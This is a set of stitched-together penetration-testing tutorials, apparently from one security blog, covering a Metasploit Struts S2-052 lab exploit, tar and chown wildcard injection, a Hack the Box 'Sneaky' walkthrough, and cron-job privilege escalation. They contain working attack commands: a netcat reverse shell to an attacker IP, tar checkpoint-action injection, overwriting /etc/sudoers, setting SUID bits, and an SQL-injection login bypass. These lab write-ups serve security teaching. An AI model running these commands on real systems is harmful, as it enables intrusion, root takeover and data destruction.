Hack The Vulnhub Pentester Lab: S2-052

Hello friend!! Today we are going to exploit another VM lab which is designed by Pentester Lab covers the exploitation of the Struts S2-052 vulnerability. The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads.

Source: https://cwiki.apache.org/confluence/display/WW/S2-052

Table of content

§  Introduction

§  Download VM

§  Enumeration (Nmap)

§  Surfing Port 80

§  Exploit the target (Metasploit)

Let’s Exploit!!

Download it from here and run this VM. Then check its network configuration through ifconfig command.

Since target belongs to 192.168.1.103 network, let’s go for its enumeration with help of nmap following command to identify running service and version.

nmap -A 192.168.1.103

From nmap scanning result we enumerated following details:

Http-server-header: Apache-coyote/1.1

Http-title: orders

Requested resource: /order.xhtml

So when we have explored /order.xhtml through the web browser it put up following webpage.

Further, we explore user Bob it brings us inside order3 web page.

Since the author has already declared that is vm is vulnerable to the Struts S2-052 therefore with the help of following module of metasploit we can directly exploit it to obtain command shell of target vm.

msf > use exploit/multi/http/struts2_rest_xstream

msf exploit(multi/http/struts2_rest_xstream) > set rhost 192.168.1.103

msf exploit(multi/http/struts2_rest_xstream) > set rport 80

msf exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3

msf exploit(multi/http/struts2_rest_xstream) > exploit

BOOOOOOM!!! Here we owned the command shell of victim’s vm.

Exploiting Wildcard for Privilege Escalation

Hello friends!! In this article, we will cover “Wildcard Injection” an interesting old-school UNIX hacking technique, which is still a successful approach for Post exploitation and even many security-related folks haven't heard of it. Here you will get surprised after perceiving some UNIX tools like 'tar' or 'chown' can lead to full system compromise.

Table of content

Introduction

Wildcard

Wildcard wildness example 1

File hijacking example 2

Post Exploitation via tar (Phase I)

Tar Wildcard Injection (1st method)

Post Exploitation via tar (Phase II)

Tar Wildcard Injection (1st method)

Tar Wildcard Injection (2nd method)

Tar Wildcard Injection (3rd method)

Let’s Start!!!

WILDCARD

The wildcard is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken.

Some Wildcards character:

*     An asterisk matches any number of character in a filename, including none.

 ?     The question mark matches any single character.

[ ]   Brackets enclose a set of characters, any one of which may match a single character at that position.

 -     A hyphen used within [ ] denotes a range of characters.

~     A tilde at the beginning of a word expands to the name of your home directory. Append another user's login name to the character, it refers to that user's home directory.

1^st Example

You might be aware of wildcard symbol and their traditional usage but here we are presenting wildcard wildness and for this, I would like to draw your attention towards below steps.

cd /Desktop

mkdir wild

cd wild

echo “Hello Friends” > file1

echo “This is wildcard Injection” >file2

echo “take help” > --help

So as you can observe, here we have made a new directory "wild" on the desktop then with help of echo command we have created 3 files and written 1 line in each file.

Afterwards, with help of cat command, we try to open all above 3 files as shown:

cat file1

cat file 2

cat --help

However, the first two files opened normally and show the same information as written above. But the cat command failed to read information written inside --help file. Instead of showing “take help” while opening --help file it calls its own --help options from its own libraries & such type of trick is called Wildcard wildness.

File owner hijacking via Chown

Similarly again we try to do something roguish with help of chown command. As we know it is an abbreviation of change owner, which is used on Unix-like systems to modify the ownership of file system files, directories and it may only be changed by a super-user. Let say we have three users in our system.

Super-user (root) - perform admin-level task such as run chown command.

Non-root-user1 (raj) - perform ordinary jobs such as create file

Non-root-user2 (aarti) - perform ordinary jobs such as create file

Mischief-user (Ignite) - perform the notorious task such as Chown file reference trick that can lead file owner hijacking.

In the following image, you can observe all the PHP file is owned by user: raj. Now when the user: ignite found all PHP file is own be user raj then he induce two PHP file himself in the same directory and use file reference trick for file owner hijacking by executing below commands.

cd

ls -al

echo “” > my.php

echo > --reference=my.php

As you can notice, mostly file is owned user: raj and the last two files are owned by user: ignite and when the super-user will be supposed to change ownership of all file having PHP extension with help of wildcard, then all files will indirectly come under the ownership of user: ignite.

As you can observe when root user run chown command to give ownership of all PHP file to the user: aarti, an error occurred and as result, the all PHP file get seized by user: ignite automatically.

chown -R aarti:aarti *.php

ls -al

Conceptual Information:

If you have ever explored chown to read its optional switches then you will find the following option.

--reference=RFILE (use RFILE's owner and group rather than specifying OWNER:GROUP values)

In our case user: ignite executed following commands:

echo “” > my.php

echo > --reference=my.php

Then root user takes help of wildcard character for changing ownership. Thing is that wildcard character used in 'chown' command line took subjective '--reference=.my.php' file and passed it to the chown command at the command line as an option.

Post Exploitation via tar (Phase I)

Lab-Setup

Likewise again we extend the wildness of wildcard character to the ultimate level and it was like a dynamic explosion in terms of system hacking.

Tar is very common UNIX program for creating and extracting archives. And with help of it, we are going to take compress backup of any directory. For example, make a new directory and give ALL permission to it and then create some files.

mkdir html

chmod 777 html

cd html

touch index.html

touch raj

touch file.txt

Now schedule a task with help of crontab to run tar archival program for taking backup of /html from inside /var/backups in every 1 minute.

nano /etc/crontab

*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

Let’s verify the schedule is working or not by executing following command.

cd /var/backup

ls

Tar Wildcard Injection (1^st method)

Privilege Escalation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

On a new terminal generate netcat reverse shell malicious code for achieving netcat reverse connection by using msfvenom and enter the following command for that.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R

Copy the generated payload and paste inside victim's shell as described below.

nc -lvp 8888

Now paste above copied payload as describe below and ran the following commands inside victim’s tty shell.

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0

/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh

echo "" > "--checkpoint-action=exec=sh shell.sh"

echo "" > --checkpoint=1

tar cf archive.tar *

The above commands help the tar command to run the file shell.sh, after the first file is archived. Since the tar command is running as root due to crontab, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888. And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in after 1 minute.

id

whoami

Conceptual Information:

If you have ever explored chown to read its optional switches then you will find the following option.

--checkpoint[=NUMBER] show progress messages every Numbers record (default 10)

 --checkpoint-action=ACTION execute ACTION on each checkpoint

There is '--checkpoint-action' option, that will specify the program which will be executed when the checkpoint is reached. Mainly, this permits us to run an arbitrary command. Hence Options '--checkpoint=1' and '--checkpoint-action=exec=sh shell.sh' are handed to the 'tar' program as command line options.

Post Exploitation via tar (Phase II)

Lab Setup

There are multiple ways to take compressed backup and multi techniques can also be applied for privilege escalation. In this phase, with help of tar, we are going to take compress backup of a directory. For example, make a new directory whose backup you wish to take and give ALL permission to it and then create some files.

cd /tmp

mkdir data

cd data

echo “” > f1

echo “” > f2

echo “” > f3

ls

Now in other directory write a bash script for taking backup of /tmp/data with help of tar archive program.

mkdir info

cd info

nano script.sh

chmod 777 script.sh

#!/bin/bash

cd /tmp/data

tar cf /backup/backup.tgz *

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

nano /etc/crontab

*/1 *   * * *   root    /info/script.sh

And after 1 minute you will notice backup.tgz file is generated inside info directory.

Tar Wildcard Injection

Privilege Escalation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a bash program script for every 1 minute and we know that cron job runs as root. The minute attacker read the program written inside the script.sh, he can apply tar wildcard injection.

Again generate netcat reverse shell payload as done above.

And again repeat above step as shown in the image.                            

Then get back to netcat shell for victim’s reverse connection and you will notice after 1 minute you get victim’s netcat session.

whoami

cd /root

pwd

Hence, the target can be easily exploited if he makes usage tar archive program either by scheduling job via command or through bash script.

Tar Wildcard Injection (2^nd method)

Privilege Escalation

Basically, with help wildcard injection an attack want to gain the highest privilege of the system, therefore, he will try to inject some malicious code with help of tar for root access. But there are multiple ways to obtain root access and hence you can apply following techniques for privilege escalation.

Suppose you have victim's machine as a non-root user and for privilege escalation either take root access or try to give sudo right to non-root user by adding him sudoers file. Thus you can take help of following commands.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh

echo "" > "--checkpoint-action=exec=sh demo.sh"

echo "" > --checkpoint=1

tar cf archive.tar *

With the help of above command we had tried to give root permission to the user: ignite and for 1 minute. After 1 minute passed we successfully owned root account.

sudo -l

sudo bash

whoami

Tar Wildcard Injection (3^rd method)

Privilege Escalation

There are multiple ways for privilege escalation with help of tar injection but we are discussing very few methods among them. Suppose you have victim's machine as the non-root user and for privilege escalation, you can try to enable SUID bit for any system binaries and likewise above again you can take help of the following command for obtaining root access.

echo "chmod u+s /usr/bin/find" > test.sh

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

tar cf archive.tar *

ls -al /usr/bin/find

find f1 -exec "whoami" \;

root

find f1 -exec "/bin/sh" \;

id

whoami

WOOhOOO!! Hope you people will enjoy this trick while penetration testing.

Source: https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

Hack the Box Challenge: Sneaky Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Sneaky” which is available online for those who want to increase their skill in penetration testing and black box testing. Sneaky is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.20 so let’s begin with nmap port enumeration.

nmap -sT -sU 10.10.10.20 

From given below image, you can observe we found port 80 and 161 are open on target system.

As port 80 is running http we open it in our browser, the website shows that it’s under construction.

We initiate dirb to enumerate the directories hosted on the target machine.

dirb http://10.10.10.20/

We find a directory called /dev/ we open it in our browser and find a login screen.

We find the login page is vulnerable to sql injection; we use this vulnerability to bypass the login page using query ‘or 1=1—in username and password.

After logging in we find a link on the webpage.

We open the link and find a RSA private key. We download the key into our system.

Now the target machine is not running any ssh service so that we can use this to login through ssh.

To investigate further we enumerate SNMP protocol to gain more information.

msf > use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 10.10.10.20

msf auxiliary(scanner/snmp/snmp_enum) > set threads 5

msf auxiliary(scanner/snmp/snmp_enum) > exploit

After enumerating the target machine we find that maybe ssh is running in ipv6.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

python enyx.py 2c public 10.10.10.20

After finding the ipv6 address of the target machine we login through ssh using the username and RSA Private key that we find after we login on the /dev/ page.

ssh -I key thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:d853

After logging in through ssh we find a file called user.txt we open it and find our first flag. Now we try to find files with suid bit set.

find / -perm -4000 2>/dev/null

We find a binary file called chal in /usr/local/bin we open it in gdb and find there is a strcpy function.

(gdb) set disassembly-flavor intel

(gdb) disas main

Now we try to check if we can overflow the memory through this strcpy function. First we create a 500 byte string using the patter create script in metasploit.

patter_create.rb -l 500

We run the file in gdb and find that the return address was overwritten with the characters in the string.

We check the size that is required to completely overwrite the return address by checking the location of the string that became the return address inside the pattern that we created. We use pattern offset tool to check the corresponding location.

pattern_offset.rb -q 316d4130 -l 500

We find that after 362 bytes the return address gets overwritten. Now we take a look at the stack to find a location for nop sled and shell code.

We picked the stack address 0xbffff510; you can change the stack pointer address and pick the shellcode according to your need.  We use python script to create our exploit and pass the output as argument for the file. When we run the command below, we get a tty shell as root user. We move to /root/ directory and find a file called root.txt; we open the file and find our final flag.

Linux Privilege Escalation by Exploiting Cron jobs

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “Privilege Escalation by exploiting Cron Jobs” to gain root access of a remote host machine and also examine how a bad implement cron job can lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

For details, you can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link1: Hack the Box Challenge: Europa Walkthrough

Link2: Hack the Milnet VM (CTF Challenge)

Table of content

·         Introduction

·         Cron job

·         Crontab syntax

·         Crontab File overwrite

·         Lab Setup (Ubuntu)

·         Exploiting cron job (Kali Linux)

·         Crontab Tar wildcard Injection

·         Lab Setup (Ubuntu)

·         Exploiting cron job (Kali Linux)

Let’s Start!!!

What is cron job?

Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They're most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on. The word Cron comes from crontab and it is present inside /etc directory.

For example:  Inside crontab we can add following entry to print apache error logs automatically in every 1 hour.

1 0 * * * printf "" > /var/log/apache/error_log

Crontab File overwrite

Lab Setup for Poorly configured cron job

Objective: Set a new job with help of crontab to run a python script which will erase all data from in a particular directory.

Let assume “cleanup” is the directory whose data will be cleared automatically in every two minutes. Thus we have saved some data inside /home/cleanup.

mkdir cleanup

cd cleanup

echo “hello freinds” > 1.txt

echo “ALL files will be deleted in 2 mints” > 2.txt

echo “” > 1.php

echo “” > 2.php

ls

As you can observe from given image some files are stored inside cleanup directory.

Now write a python program in any other directory to delete data from inside /home/cleanup and give it all permission.

cd /tmp

nano cleanup.py

#!/usr/bin/env python

import os

import sys

try:

    os.system('rm -r /home/cleanup/* ')

except:

    sys.exit()

chmod 777 cleanup.py

At last schedule a task with help of crontab to run cleanup.py for every 2 minutes.

nano /etc/crontab

*/2 *   * * *   root    /tmp /cleanup.py

Now let’s verify the objectives

cd /home/cleanup

ls

date

ls

Coool!! It is working, as you can see all file has been deleted after two minutes.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Execute the following command as shown below.

cat /etc/crontab

ls  -al /tmp/cleanup.py

cat /tmp/cleanup.py

From above steps, we notice the crontab is running python script in every two minutes now let’s exploit.

There so many methods to gain root access as in this method we enabled SUID bits /bin/dash. It is quite simple, first, open the file through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from the following line as given below

os.system(‘chmod u+s /bin/dash)

After two minutes it will set SUID permission for /bin/dash and when you will run it will give root access.

/bin/dash

id

whoami

Awesome!! We hit the Goal…………………

Crontab Tar Wildcard Injection

Lab Setup

Objective: schedule a task with help of crontab to take backup with tar archival program of HTML directory.

The directory should have executable permission whose backup you are going to take.

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

nano /etc/crontab

*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

Let's verify the schedule is working or not by executing following command.

cd /var/backup

ls

date

From given below image you can notice the html.tgz file has been generated after 1 minute.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

Execute following command to grant sudo right to logged user and following post exploitation is known as wildcard injection.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

tar cf archive.tar *

Now after 1 minute it will grant sudo right to the user: ignite as you can confirm this with the given below image.

sudo -l

sudo bash

whoami

YUPPIEEEE!!! We have successfully obtained root access.